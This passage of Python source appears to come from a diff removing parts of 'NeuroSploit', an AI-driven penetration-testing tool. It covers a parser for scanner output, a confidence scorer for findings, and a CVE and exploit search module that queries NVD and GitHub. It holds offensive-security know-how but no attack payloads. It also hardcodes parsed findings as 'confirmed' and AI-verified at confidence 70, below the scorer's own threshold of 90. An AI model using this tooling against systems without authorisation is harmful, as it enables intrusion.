NUCLEI_JSON_PATTERN = re.compile(r'^\{.*"template-id".*"matched-at".*\}$', re.MULTILINE)
# Generic vulnerability patterns in CLI output
VULN_PATTERNS = [
# [VULNERABILITY] Title - Severity
re.compile(
r'\[(?:VULNERABILITY|VULN|FINDING|ALERT)\]\s*(.+?)(?:\s*[-]\s*(critical|high|medium|low|info))?$',
re.IGNORECASE | re.MULTILINE
),
# SQLMap style: Parameter 'X' is vulnerable
re.compile(
r"(?:Parameter|Param)\s+['\"]?(\w+)['\"]?\s+(?:is|appears)\s+(?:vulnerable|injectable)",
re.IGNORECASE
),
# Nuclei text: [severity] [template-id] URL
re.compile(
r'\[(critical|high|medium|low|info)\]\s*\[([^\]]+)\]\s*(https?://\S+)',
re.IGNORECASE
),
]
@dataclass
class ParsedFinding:
"""A finding extracted from CLI output."""
title: str
severity: str = "medium"
vulnerability_type: str = ""
endpoint: str = ""
parameter: str = ""
evidence: str = ""
poc_code: str = ""
request: str = ""
response: str = ""
impact: str = ""
cvss_score: Optional[float] = None
source: str = "cli_agent"
def to_dict(self) -> Dict:
d = {
"title": self.title,
"severity": self.severity,
"vulnerability_type": self.vulnerability_type or self._infer_vuln_type(),
"affected_endpoint": self.endpoint,
"parameter": self.parameter,
"evidence": self.evidence,
"poc_code": self.poc_code,
"request": self.request,
"response": self.response,
"impact": self.impact,
"source": self.source,
"ai_status": "confirmed",
"ai_verified": True,
"confidence_score": 70,
}
if self.cvss_score is not None:
d["cvss_score"] = self.cvss_score
return d
def _infer_vuln_type(self) -> str:
"""Infer vulnerability type from title keywords."""
title_lower = self.title.lower()
type_map = {
"sql injection": "sqli_error", "sqli": "sqli_error",
"xss": "xss_reflected", "cross-site scripting": "xss_reflected",
"stored xss": "xss_stored", "dom xss": "xss_dom",
"command injection": "command_injection", "rce": "command_injection",
"ssrf": "ssrf", "server-side request": "ssrf",
"lfi": "lfi", "local file": "lfi", "path traversal": "path_traversal",
"rfi": "rfi", "remote file": "rfi",
"xxe": "xxe", "xml external": "xxe",
"ssti": "ssti", "template injection": "ssti",
"csrf": "csrf", "cross-site request": "csrf",
"idor": "idor", "insecure direct": "idor",
"open redirect": "open_redirect",
"file upload": "file_upload",
"directory listing": "directory_listing",
"information disclosure": "information_disclosure",
"sensitive data": "sensitive_data_exposure",
"security header": "security_headers",
"ssl": "ssl_issues", "tls": "ssl_issues",
"cors": "cors_misconfig",
"crlf": "crlf_injection",
"nosql": "nosql_injection",
"ldap": "ldap_injection",
"jwt": "jwt_manipulation",
"auth bypass": "auth_bypass",
"brute force": "brute_force",
"rate limit": "rate_limit_bypass",
"clickjacking": "clickjacking",
"http smuggling": "http_smuggling",
"cache poison": "cache_poisoning",
"deserialization": "insecure_deserialization",
"prototype pollution": "prototype_pollution",
"graphql": "graphql_injection",
"host header": "host_header_injection",
"race condition": "race_condition",
"business logic": "business_logic",
}
for keyword, vtype in type_map.items():
if keyword in title_lower:
return vtype
return "unknown"
class CLIOutputParser:
"""3-tier output parser for CLI agent findings."""
def __init__(self):
self._seen_finding_hashes: Set[str] = set()
self._buffer = "" # Accumulates partial JSON blocks across chunks
self._unparsed_chunks: List[str] = []
self._total_findings = 0
self._phases_seen: List[str] = []
self._is_complete = False
def parse_chunk(self, text: str) -> List[ParsedFinding]:
"""Parse a chunk of CLI output. Returns newly extracted findings."""
if not text or not text.strip():
return []
findings: List[ParsedFinding] = []
# Track progress markers
for m in PHASE_PATTERN.finditer(text):
phase = m.group(1).strip()
if phase not in self._phases_seen:
self._phases_seen.append(phase)
logger.info(f"[CLI-PARSER] Phase: {phase}")
if COMPLETE_PATTERN.search(text):
self._is_complete = True
# Tier 1: JSON marker blocks
combined = self._buffer + text
tier1 = self._extract_json_markers(combined)
findings.extend(tier1)
# Tier 2: Regex patterns
tier2 = self._extract_regex_findings(text)
findings.extend(tier2)
# Tier 2b: Nuclei JSONL
tier2b = self._extract_nuclei_jsonl(text)
findings.extend(tier2b)
# Track unparsed text for later AI extraction
if not tier1 and not tier2 and not tier2b:
if len(text.strip()) > 50:
self._unparsed_chunks.append(text)
# Deduplicate
unique = []
for f in findings:
h = f"{f.title}|{f.endpoint}|{f.severity}"
if h not in self._seen_finding_hashes:
self._seen_finding_hashes.add(h)
unique.append(f)
self._total_findings += 1
return unique
def get_unparsed_text(self, clear: bool = True) -> str:
"""Get accumulated unparsed text for AI extraction."""
text = "\n".join(self._unparsed_chunks)
if clear:
self._unparsed_chunks = []
return text
@property
def is_complete(self) -> bool:
return self._is_complete
@property
def phases(self) -> List[str]:
return self._phases_seen
@property
def total_findings(self) -> int:
return self._total_findings
def _extract_json_markers(self, text: str) -> List[ParsedFinding]:
"""Tier 1: Extract findings from ===FINDING_START=== / ===FINDING_END=== blocks."""
findings = []
remaining_buffer = ""
# Find all complete blocks
parts = text.split(FINDING_START)
for i, part in enumerate(parts):
if i == 0:
continue # Text before first marker
if FINDING_END in part:
json_text, after = part.split(FINDING_END, 1)
json_text = json_text.strip()
try:
data = json.loads(json_text)
f = self._json_to_finding(data)
if f:
findings.append(f)
except json.JSONDecodeError:
# Try to fix common JSON issues
fixed = self._try_fix_json(json_text)
if fixed:
f = self._json_to_finding(fixed)
if f:
findings.append(f)
else:
logger.debug(f"[CLI-PARSER] Invalid JSON in marker block: {json_text[:100]}")
else:
# Incomplete block - save to buffer for next chunk
remaining_buffer = FINDING_START + part
self._buffer = remaining_buffer
return findings
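The buffering behaviour of Tier 1 matters because output arrives in arbitrary chunks, so a finding block can be split across two reads. A self-contained sketch of the same idea follows; `MarkerBuffer` is a hypothetical simplification that returns raw dicts and skips the JSON-repair fallback.

```python
import json
from typing import Dict, List

FINDING_START = "===FINDING_START==="
FINDING_END = "===FINDING_END==="


class MarkerBuffer:
    """Carry an unfinished marker block over to the next chunk."""

    def __init__(self) -> None:
        self._buffer = ""

    def feed(self, chunk: str) -> List[Dict]:
        text = self._buffer + chunk
        self._buffer = ""
        found: List[Dict] = []
        # parts[0] is the text before the first start marker; skip it.
        for part in text.split(FINDING_START)[1:]:
            if FINDING_END in part:
                body, _rest = part.split(FINDING_END, 1)
                try:
                    found.append(json.loads(body.strip()))
                except json.JSONDecodeError:
                    pass  # malformed block: ignored in this sketch
            else:
                # No end marker yet: keep the block for the next chunk.
                self._buffer = FINDING_START + part
        return found


buf = MarkerBuffer()
first = buf.feed('noise ===FINDING_START===\n{"title": "SQLi", ')
second = buf.feed('"severity": "high"}\n===FINDING_END=== more output')
```

As in the method above, a marker string that is itself cut in half between two chunks is not recognised; only the block body is allowed to span chunks.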
def _extract_regex_findings(self, text: str) -> List[ParsedFinding]:
"""Tier 2: Extract findings using regex patterns."""
findings = []
for pattern in VULN_PATTERNS:
for match in pattern.finditer(text):
groups = match.groups()
if len(groups) >= 1:
title = groups[0].strip()
severity = "medium"
endpoint = ""
if len(groups) >= 2 and groups[1]:
sev = groups[1].lower().strip()
severity = SEVERITY_MAP.get(sev, "medium")
if len(groups) >= 3 and groups[2]:
endpoint = groups[2].strip()
# Skip very short or generic titles
if len(title) < 5 or title.lower() in ("n/a", "none", "test"):
continue
findings.append(ParsedFinding(
title=title,
severity=severity,
endpoint=endpoint,
evidence=match.group(0),
))
return findings
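With positional groups, `_extract_regex_findings` treats the first group of every pattern as the title, yet in the Nuclei text pattern the first group is the severity and the second is the template ID. One possible alternative, shown here only as a sketch, is to use named groups so each pattern states which field it captures. `NAMED_PATTERNS` and `extract` are hypothetical names, and the sample lines are made up.

```python
import re
from typing import Dict, List

SEVERITIES = "critical|high|medium|low|info"

NAMED_PATTERNS = [
    # [VULNERABILITY] Title - severity
    re.compile(
        rf"\[(?:VULNERABILITY|VULN|FINDING|ALERT)\]\s*(?P<title>.+?)"
        rf"(?:\s*-\s*(?P<severity>{SEVERITIES}))?$",
        re.IGNORECASE | re.MULTILINE,
    ),
    # Nuclei text: [severity] [template-id] URL
    re.compile(
        rf"\[(?P<severity>{SEVERITIES})\]\s*\[(?P<title>[^\]]+)\]\s*"
        rf"(?P<endpoint>https?://\S+)",
        re.IGNORECASE,
    ),
]


def extract(text: str) -> List[Dict[str, str]]:
    """Collect title/severity/endpoint from every pattern by group name."""
    results = []
    for pattern in NAMED_PATTERNS:
        for match in pattern.finditer(text):
            groups = match.groupdict()
            results.append({
                "title": groups["title"].strip(),
                "severity": (groups.get("severity") or "medium").lower(),
                "endpoint": groups.get("endpoint") or "",
            })
    return results


sample = (
    "[VULNERABILITY] Reflected XSS in search - high\n"
    "[critical] [example-template-id] https://example.test/cgi-bin/\n"
)
results = extract(sample)
```

Named groups keep the field mapping next to the pattern itself, so adding a new tool format does not require the extraction loop to know the group order.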
def _extract_nuclei_jsonl(self, text: str) -> List[ParsedFinding]:
"""Tier 2b: Extract findings from Nuclei JSONL output."""
findings = []
for match in NUCLEI_JSON_PATTERN.finditer(text):
try:
data = json.loads(match.group(0))
template_id = data.get("template-id", "")
matched_at = data.get("matched-at", "")
info = data.get("info", {})
severity = info.get("severity", "medium").lower()
name = info.get("name", template_id)
description = info.get("description", "")
findings.append(ParsedFinding(
title=f"[Nuclei] {name}",
severity=SEVERITY_MAP.get(severity, "medium"),
vulnerability_type=self._nuclei_to_vuln_type(template_id),
endpoint=matched_at,
evidence=f"Template: {template_id}\n{description}",
poc_code=f"nuclei -t {template_id} -u {matched_at}",
))
except json.JSONDecodeError:
continue
return findings
def _json_to_finding(self, data: Dict) -> Optional[ParsedFinding]:
"""Convert a JSON dict to ParsedFinding."""
title = data.get("title", "").strip()
if not title:
return None
severity = data.get("severity", "medium").lower()
severity = SEVERITY_MAP.get(severity, severity)
if severity not in ("critical", "high", "medium", "low", "info"):
severity = "medium"
return ParsedFinding(
title=title,
severity=severity,
vulnerability_type=data.get("vulnerability_type", ""),
endpoint=data.get("endpoint", data.get("affected_endpoint", "")),
parameter=data.get("parameter", ""),
evidence=data.get("evidence", ""),
poc_code=data.get("poc_code", data.get("poc", "")),
request=data.get("request", ""),
response=data.get("response", ""),
impact=data.get("impact", ""),
cvss_score=data.get("cvss_score"),
)
@staticmethod
def _try_fix_json(text: str) -> Optional[Dict]:
"""Try to fix common JSON issues."""
# Remove trailing commas
fixed = re.sub(r',\s*}', '}', text)
fixed = re.sub(r',\s*]', ']', fixed)
# Try to parse
try:
return json.loads(fixed)
except json.JSONDecodeError:
pass
# Try wrapping in braces
if not fixed.startswith('{'):
try:
return json.loads('{' + fixed + '}')
except json.JSONDecodeError:
pass
return None
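The trailing-comma repair in `_try_fix_json` can be exercised on its own. This sketch reproduces only the two substitutions; `repair_json` is a hypothetical name, and the brace-wrapping fallback is left out.

```python
import json
import re
from typing import Dict, Optional


def repair_json(text: str) -> Optional[Dict]:
    """Strip trailing commas before '}' and ']' and try to parse."""
    fixed = re.sub(r",\s*}", "}", text)
    fixed = re.sub(r",\s*]", "]", fixed)
    try:
        return json.loads(fixed)
    except json.JSONDecodeError:
        return None


repaired = repair_json('{"title": "XSS", "tags": ["a", "b",],}')
unrepairable = repair_json("not json at all")
# Caveat: the regex is not string-aware, so ",}" inside a value is altered too.
altered = repair_json('{"evidence": "a,}"}')
```

The last case shows the trade-off of a regex-based repair: it is cheap and covers the common LLM mistake, but it can silently change evidence text that happens to contain `,}` or `,]`.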
@staticmethod
def _nuclei_to_vuln_type(template_id: str) -> str:
"""Map nuclei template ID to vulnerability type."""
tid = template_id.lower()
mappings = {
"sqli": "sqli_error", "sql-injection": "sqli_error",
"xss": "xss_reflected", "cross-site-scripting": "xss_reflected",
"ssrf": "ssrf", "server-side-request": "ssrf",
"lfi": "lfi", "local-file": "lfi",
"rfi": "rfi", "remote-file": "rfi",
"rce": "command_injection", "command-injection": "command_injection",
"ssti": "ssti", "template-injection": "ssti",
"xxe": "xxe", "xml-external": "xxe",
"redirect": "open_redirect",
"cors": "cors_misconfig",
"crlf": "crlf_injection",
"csrf": "csrf",
"header-injection": "header_injection",
"directory-listing": "directory_listing",
"info-disclosure": "information_disclosure",
"exposure": "sensitive_data_exposure",
"ssl": "ssl_issues", "tls": "ssl_issues",
"default-login": "default_credentials",
"misconfig": "security_headers",
}
for key, vtype in mappings.items():
if key in tid:
return vtype
return "unknown"
# AI-assisted extraction prompt template
AI_EXTRACT_PROMPT = """Analyze this penetration testing CLI output and extract any CONFIRMED vulnerability findings.
IMPORTANT: Only extract findings where there is clear evidence of a vulnerability (error messages,
data leakage, successful exploitation). Do NOT extract theoretical or untested issues.
CLI Output:
{output}
For each confirmed finding, provide:
- title: concise vulnerability name
- severity: critical|high|medium|low|info
- vulnerability_type: e.g., sqli_error, xss_reflected, ssrf, command_injection, etc.
- endpoint: the affected URL
- parameter: affected parameter (if applicable)
- evidence: the actual proof (HTTP response, error, data leaked)
- poc_code: the command or request that confirmed it
Respond ONLY with valid JSON:
{{"findings": [{{"title": "...", "severity": "...", "vulnerability_type": "...", "endpoint": "...", "parameter": "...", "evidence": "...", "poc_code": "..."}}]}}
If no confirmed findings, respond: {{"findings": []}}"""
async def ai_extract_findings(text: str, llm, max_chars: int = 8000) -> List[ParsedFinding]:
"""Tier 3: AI-assisted extraction of findings from unstructured CLI output."""
if not text or len(text.strip()) < 100:
return []
# Truncate to max_chars
if len(text) > max_chars:
text = text[:max_chars] + "\n... [truncated]"
prompt = AI_EXTRACT_PROMPT.format(output=text)
try:
response = await llm.generate(
prompt=prompt,
system="You are a security finding extractor. Extract only confirmed vulnerabilities with real evidence.",
max_tokens=2000,
)
if not response:
return []
# Extract JSON from response
json_match = re.search(r'\{.*"findings".*\}', response, re.DOTALL)
if not json_match:
return []
data = json.loads(json_match.group(0))
findings_data = data.get("findings", [])
findings = []
for fd in findings_data:
if not fd.get("title"):
continue
findings.append(ParsedFinding(
title=fd["title"],
severity=SEVERITY_MAP.get(str(fd.get("severity") or "medium").lower(), "medium"),
vulnerability_type=fd.get("vulnerability_type", ""),
endpoint=fd.get("endpoint", ""),
parameter=fd.get("parameter", ""),
evidence=fd.get("evidence", ""),
poc_code=fd.get("poc_code", ""),
))
logger.info(f"[CLI-PARSER] AI extracted {len(findings)} findings")
return findings
except Exception as e:
logger.warning(f"[CLI-PARSER] AI extraction failed: {e}")
return []
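The JSON-recovery step of Tier 3 relies on a greedy regex to pull the object out of whatever prose the model wraps around it. A minimal sketch of that step alone, with a made-up response string and a hypothetical helper name `extract_findings_json`:

```python
import json
import re
from typing import Dict, List


def extract_findings_json(response: str) -> List[Dict]:
    """Find the outermost {...} containing "findings" and parse it."""
    match = re.search(r'\{.*"findings".*\}', response, re.DOTALL)
    if not match:
        return []
    try:
        data = json.loads(match.group(0))
    except json.JSONDecodeError:
        return []
    return data.get("findings", [])


# Made-up model response with prose around the JSON payload.
response = (
    "Here are the results:\n"
    '{"findings": [{"title": "Open redirect", "severity": "medium"}]}\n'
    "Done."
)
found = extract_findings_json(response)
none_found = extract_findings_json("No structured output this time.")
```

Because the pattern is greedy, it spans from the first `{` to the last `}` in the response; trailing prose that contains a closing brace would make the parse fail, in which case this sketch returns an empty list.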
@@ -1,179 +0,0 @@
"""
NeuroSploit v3 - Confidence Scoring Engine
Numeric 0-100 confidence scoring for vulnerability findings.
Combines proof of execution, negative control results, and signal analysis
into a single score with transparent breakdown.
Score Thresholds:
>= 90 -> "confirmed" (AI Verified, high confidence)
>= 60 -> "likely" (needs manual review)
< 60 -> "rejected" (auto-reject, false positive)
"""
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ConfidenceResult:
"""Result of confidence scoring."""
score: int # 0-100
verdict: str # "confirmed" | "likely" | "rejected"
breakdown: Dict[str, int] = field(default_factory=dict) # Component scores
detail: str = "" # Human-readable explanation
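The score thresholds from the module docstring map onto verdicts as follows. This is a sketch of the threshold logic only; `verdict_for` is a hypothetical helper, and the sample scores are arbitrary.

```python
THRESHOLD_CONFIRMED = 90
THRESHOLD_LIKELY = 60


def verdict_for(raw_score: int) -> str:
    """Clamp a raw score to 0..100 and map it to a verdict."""
    score = max(0, min(100, raw_score))
    if score >= THRESHOLD_CONFIRMED:
        return "confirmed"
    if score >= THRESHOLD_LIKELY:
        return "likely"
    return "rejected"


# Arbitrary raw scores, including values outside 0..100 before clamping.
verdicts = {s: verdict_for(s) for s in (110, 90, 89, 60, 59, -20)}
print(verdicts)
```

Clamping happens before the comparison, so component sums above 100 or below 0 still land in a defined band.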
# ---------------------------------------------------------------------------
# Scorer
# ---------------------------------------------------------------------------
class ConfidenceScorer:
"""Calculates numeric confidence score 0-100 for vulnerability findings.
Weights:
+0-60 Proof of execution (per vuln type; the most important signal)
+0-30 Proof of impact (severity-aware)
+0-20 Negative controls passed (response differs from benign)
-40 Only baseline diff signal (no actual proof of exploitation)
-60 Same behavior on negative controls (critical false positive indicator)
-40 AI interpretation says payload was ineffective
"""
# Threshold constants
THRESHOLD_CONFIRMED = 90
THRESHOLD_LIKELY = 60
# Weight caps
MAX_PROOF_SCORE = 60
MAX_IMPACT_SCORE = 30
MAX_CONTROLS_BONUS = 20
PENALTY_ONLY_DIFF = -40
PENALTY_SAME_BEHAVIOR = -60
PENALTY_AI_INEFFECTIVE = -40
# Keywords in AI interpretation that indicate payload was ineffective
INEFFECTIVE_KEYWORDS = [
"ignored", "not processed", "blocked", "filtered",
"sanitized", "rejected", "not executed", "was not",
"does not", "did not", "no effect", "no impact",
"benign", "safe", "harmless",
]
def calculate(
self,
signals: List[str],
proof_result, # ProofResult from proof_of_execution
control_result, # NegativeControlResult from negative_control
ai_interpretation: Optional[str] = None,
) -> ConfidenceResult:
"""Calculate confidence score from all verification components.
Args:
signals: List of signal names from multi_signal_verify
(e.g., ["baseline_diff", "payload_effect"])
proof_result: ProofResult from ProofOfExecution.check()
control_result: NegativeControlResult from NegativeControlEngine
ai_interpretation: Optional AI response interpretation text
Returns:
ConfidenceResult with score, verdict, breakdown, and detail
"""
breakdown: Dict[str, int] = {}
score = 0
# ── Component 1: Proof of Execution (0-60) ────────────────────
proof_score = min(proof_result.score, self.MAX_PROOF_SCORE) if proof_result else 0
score += proof_score
breakdown["proof_of_execution"] = proof_score
# ── Component 2: Proof of Impact (0-30) ───────────────────────
impact_score = 0
if proof_result and proof_result.proven:
if proof_result.impact_demonstrated:
impact_score = self.MAX_IMPACT_SCORE # Full impact shown
else:
impact_score = 15 # Proven but no impact demonstration
score += impact_score
breakdown["proof_of_impact"] = impact_score
# ── Component 3: Negative Controls (bonus/penalty) ─────────────
controls_score = 0
if control_result:
if control_result.same_behavior:
controls_score = self.PENALTY_SAME_BEHAVIOR # -60
else:
controls_score = min(
self.MAX_CONTROLS_BONUS,
control_result.confidence_adjustment
) # capped at +20
score += controls_score
breakdown["negative_controls"] = controls_score
# ── Penalty: Only baseline diff signal ─────────────────────────
diff_penalty = 0
if signals and set(signals) <= {"baseline_diff", "new_errors"}:
# Only diff-based signals, no actual payload effect
if proof_score == 0:
diff_penalty = self.PENALTY_ONLY_DIFF # -40
score += diff_penalty
breakdown["diff_only_penalty"] = diff_penalty
# ── Penalty: AI says payload was ineffective ──────────────────
ai_penalty = 0
if ai_interpretation:
ai_lower = ai_interpretation.lower()
if any(kw in ai_lower for kw in self.INEFFECTIVE_KEYWORDS):
ai_penalty = self.PENALTY_AI_INEFFECTIVE # -40
score += ai_penalty
breakdown["ai_ineffective_penalty"] = ai_penalty
# ── Clamp and determine verdict ────────────────────────────────
score = max(0, min(100, score))
if score >= self.THRESHOLD_CONFIRMED:
verdict = "confirmed"
elif score >= self.THRESHOLD_LIKELY:
verdict = "likely"
else:
verdict = "rejected"
# Build detail string
detail_parts = []
if proof_result and proof_result.proven:
detail_parts.append(f"Proof: {proof_result.proof_type} ({proof_score}pts)")
else:
detail_parts.append("No proof of execution (0pts)")
if impact_score > 0:
detail_parts.append(f"Impact: +{impact_score}pts")
if control_result:
if control_result.same_behavior:
detail_parts.append(
f"NEGATIVE CONTROL FAIL: {control_result.controls_matching}/"
f"{control_result.controls_run} same behavior ({controls_score}pts)")
else:
detail_parts.append(f"Controls passed (+{controls_score}pts)")
if diff_penalty:
detail_parts.append(f"Only-diff penalty ({diff_penalty}pts)")
if ai_penalty:
detail_parts.append(f"AI-ineffective penalty ({ai_penalty}pts)")
detail = f"Score: {score}/100 [{verdict}] — " + "; ".join(detail_parts)
return ConfidenceResult(
score=score,
verdict=verdict,
breakdown=breakdown,
detail=detail,
)
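The weighting in `ConfidenceScorer.calculate` can be worked through by hand. The sketch below is a simplified, standalone restatement of that arithmetic, not the module itself: `StubProof`, `StubControls` and `sketch_score` are hypothetical names, the stubs carry only the attributes that `calculate` reads, and the AI penalty checks a reduced keyword list.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class StubProof:
    """Hypothetical stand-in for ProofResult (only the fields used here)."""
    score: int
    proven: bool
    impact_demonstrated: bool


@dataclass
class StubControls:
    """Hypothetical stand-in for NegativeControlResult."""
    same_behavior: bool
    confidence_adjustment: int


def sketch_score(signals: List[str], proof: Optional[StubProof],
                 controls: Optional[StubControls],
                 ai_text: Optional[str] = None) -> Tuple[int, str]:
    """Apply the caps and penalties, then clamp to 0-100 and pick a verdict."""
    proof_pts = min(proof.score, 60) if proof else 0
    impact_pts = 0
    if proof and proof.proven:
        impact_pts = 30 if proof.impact_demonstrated else 15
    control_pts = 0
    if controls:
        control_pts = -60 if controls.same_behavior else min(20, controls.confidence_adjustment)
    # The diff-only penalty applies only when no proof points were earned.
    diff_only = bool(signals) and set(signals) <= {"baseline_diff", "new_errors"}
    diff_pts = -40 if diff_only and proof_pts == 0 else 0
    # Reduced keyword list, for illustration only.
    ai_pts = -40 if ai_text and any(k in ai_text.lower() for k in ("blocked", "sanitized")) else 0
    total = max(0, min(100, proof_pts + impact_pts + control_pts + diff_pts + ai_pts))
    verdict = "confirmed" if total >= 90 else "likely" if total >= 60 else "rejected"
    return total, verdict


# 60 + 30 + 20 = 110, clamped to 100
strong = sketch_score(["payload_effect"], StubProof(60, True, True), StubControls(False, 20))
# 45 + 15 + 20 = 80
partial = sketch_score(["payload_effect"], StubProof(45, True, False), StubControls(False, 20))
# 0 - 60 - 40 = -100, clamped to 0
weak = sketch_score(["baseline_diff"], None, StubControls(True, 0))
```

Under these assumptions a finding needs both proof of execution and at least one supporting component to reach the 90-point "confirmed" threshold, since proof alone is capped at 60.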
-318
@@ -1,318 +0,0 @@
"""
CVE and exploit search engine for NeuroSploitv2.
Extracts software versions from HTTP responses, queries NVD for known CVEs,
and searches GitHub for public exploit code. Fully async, self-contained.
"""
import asyncio
import logging
import re
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
try:
import aiohttp
except ImportError:
aiohttp = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
# ── Dataclasses ───────────────────────────────────────────────────────────
@dataclass
class VersionInfo:
software: str
version: str
source: str # "server_header", "body", "meta_generator", etc.
@dataclass
class CVEResult:
cve_id: str
cvss_score: float
severity: str
description: str
cwe_id: str
affected_versions: str
published_date: str
@dataclass
class ExploitResult:
source: str # "github" or "exploitdb"
url: str
description: str
stars: int
language: str
@dataclass
class CVEFinding:
version_info: VersionInfo
cves: List[CVEResult] = field(default_factory=list)
exploits: List[ExploitResult] = field(default_factory=list)
# ── Regex patterns ────────────────────────────────────────────────────────
_SERVER_TOKEN_RE = re.compile(r"([A-Za-z][\w\.\-]*)/(\d+(?:\.\d+)+)")
_META_GENERATOR_RE = re.compile(
r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']([^"\']+)["\']', re.I)
_JS_LIB_RE = re.compile(
r"(jquery|react|angular|vue|bootstrap|lodash|moment|backbone)"
r"[\-@/]?(\d+(?:\.\d+)+)", re.I)
_WP_VERSION_RE = re.compile(r'content=["\']WordPress\s+([\d.]+)', re.I)
_DRUPAL_VERSION_RE = re.compile(r'Drupal\s+([\d.]+)', re.I)
_JOOMLA_VERSION_RE = re.compile(
r'<meta[^>]+content=["\']Joomla!\s*-?\s*([\d.]+)', re.I)
_GENERIC_VERSION_RE = re.compile(
r"\b([A-Z][A-Za-z\-]+)\s+(?:version\s+)?v?(\d+\.\d+(?:\.\d+)?)\b")
_NVD_RPM_NO_KEY = 6
_NVD_RPM_WITH_KEY = 50
_REQUEST_TIMEOUT = 10
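To see what the version patterns above actually capture, the following sketch runs two of them against made-up inputs. The regexes are copied from the definitions above; the header and HTML strings are illustrative samples, not captured traffic.

```python
import re

# Same patterns as _SERVER_TOKEN_RE and _JS_LIB_RE above.
SERVER_TOKEN_RE = re.compile(r"([A-Za-z][\w\.\-]*)/(\d+(?:\.\d+)+)")
JS_LIB_RE = re.compile(
    r"(jquery|react|angular|vue|bootstrap|lodash|moment|backbone)"
    r"[\-@/]?(\d+(?:\.\d+)+)", re.I)

# Illustrative inputs (assumptions, not real responses).
server_header = "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f"
html_body = '<script src="/static/jquery-3.6.0.min.js"></script>'

server_hits = SERVER_TOKEN_RE.findall(server_header)
js_hits = JS_LIB_RE.findall(html_body)

for name, version in server_hits + js_hits:
    print(f"{name} {version}")
```

Two properties are worth noting: the version group requires at least one dot, so a bare `PHP/8` token yields nothing, and trailing letters such as the `f` in `1.1.1f` are dropped from the captured version.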
# ── CVEHunter ─────────────────────────────────────────────────────────────
class CVEHunter:
"""Async CVE and exploit search engine."""
def __init__(self, session=None, nvd_api_key=None, github_token=None):
self._external_session = session is not None
self._session = session
self._nvd_api_key = nvd_api_key
self._github_token = github_token
rpm = _NVD_RPM_WITH_KEY if nvd_api_key else _NVD_RPM_NO_KEY
self._nvd_min_interval = 60.0 / rpm
self._nvd_last_request: float = 0.0
async def _get_session(self) -> "aiohttp.ClientSession":
if aiohttp is None:
raise RuntimeError("aiohttp is required but not installed")
if self._session is None or self._session.closed:
self._session = aiohttp.ClientSession(
timeout=aiohttp.ClientTimeout(total=_REQUEST_TIMEOUT))
return self._session
async def close(self):
if not self._external_session and self._session and not self._session.closed:
await self._session.close()
# ── Version extraction ────────────────────────────────────────────
async def extract_versions(self, headers: Dict[str, str], body: str,
technologies: Optional[List[str]] = None) -> List[VersionInfo]:
seen: set[Tuple[str, str]] = set()
results: List[VersionInfo] = []
def _add(sw: str, ver: str, src: str):
key = (sw.lower(), ver)
if key not in seen:
seen.add(key)
results.append(VersionInfo(software=sw, version=ver, source=src))
# Server header
server = headers.get("server") or headers.get("Server") or ""
for m in _SERVER_TOKEN_RE.finditer(server):
_add(m.group(1), m.group(2), "server_header")
# X-Powered-By
xpb = headers.get("x-powered-by") or headers.get("X-Powered-By") or ""
for m in _SERVER_TOKEN_RE.finditer(xpb):
_add(m.group(1), m.group(2), "x_powered_by")
if xpb and not _SERVER_TOKEN_RE.search(xpb):
parts = xpb.strip().split("/", 1)
if len(parts) == 2 and re.match(r"\d", parts[1]):
_add(parts[0].strip(), parts[1].strip(), "x_powered_by")
# Meta generator tags
for m in _META_GENERATOR_RE.finditer(body):
gp = m.group(1).strip().rsplit(" ", 1)
if len(gp) == 2 and re.match(r"\d", gp[1]):
_add(gp[0], gp[1], "meta_generator")
# CMS-specific patterns
for m in _WP_VERSION_RE.finditer(body):
_add("WordPress", m.group(1), "body")
for m in _DRUPAL_VERSION_RE.finditer(body):
_add("Drupal", m.group(1), "body")
for m in _JOOMLA_VERSION_RE.finditer(body):
_add("Joomla", m.group(1), "body")
# JS libraries (jquery, react, angular, etc.)
for m in _JS_LIB_RE.finditer(body):
_add(m.group(1), m.group(2), "body")
# Generic "SoftwareName version X.Y.Z"
for m in _GENERIC_VERSION_RE.finditer(body):
_add(m.group(1), m.group(2), "body")
# Supplied technology list
for tech in (technologies or []):
tp = re.split(r"[\s/]+", tech.strip(), maxsplit=1)
if len(tp) == 2 and re.match(r"\d", tp[1]):
_add(tp[0], tp[1], "technology_list")
return [v for v in results if v.version]
# ── NVD search ────────────────────────────────────────────────────
async def _nvd_rate_limit(self):
elapsed = time.monotonic() - self._nvd_last_request
if elapsed < self._nvd_min_interval:
await asyncio.sleep(self._nvd_min_interval - elapsed)
self._nvd_last_request = time.monotonic()
async def search_nvd(self, software: str, version: str) -> List[CVEResult]:
"""Query NVD 2.0 API for CVEs matching software + version."""
session = await self._get_session()
await self._nvd_rate_limit()
params = {"keywordSearch": f"{software} {version}"}
hdrs: Dict[str, str] = {}
if self._nvd_api_key:
hdrs["apiKey"] = self._nvd_api_key
results: List[CVEResult] = []
try:
async with session.get("https://services.nvd.nist.gov/rest/json/cves/2.0",
params=params, headers=hdrs) as resp:
if resp.status == 403:
logger.warning("NVD rate limit hit (403). Backing off.")
await asyncio.sleep(30)
return results
if resp.status != 200:
logger.warning("NVD returned %d for %s %s", resp.status, software, version)
return results
data = await resp.json(content_type=None)
except asyncio.TimeoutError:
logger.warning("NVD request timed out for %s %s", software, version)
return results
except Exception as exc:
logger.warning("NVD request failed for %s %s: %s", software, version, exc)
return results
seen_ids: set[str] = set()
for item in data.get("vulnerabilities", []):
cve = item.get("cve", {})
cve_id = cve.get("id", "")
if not cve_id or cve_id in seen_ids:
continue
seen_ids.add(cve_id)
# CVSS: prefer v3.1 → v3.0 → v2
cvss_score, severity = 0.0, "UNKNOWN"
for mk in ("cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
ml = cve.get("metrics", {}).get(mk, [])
if ml:
cd = ml[0].get("cvssData", {})
cvss_score = cd.get("baseScore", 0.0)
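# CVSS v2 entries carry baseSeverity on the metric itself, not inside cvssData
severity = cd.get("baseSeverity") or ml[0].get("baseSeverity", "UNKNOWN")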
break
# English description
desc = next((d["value"] for d in cve.get("descriptions", [])
if d.get("lang") == "en"), "")
# CWE ID
cwe_id = ""
for w in cve.get("weaknesses", []):
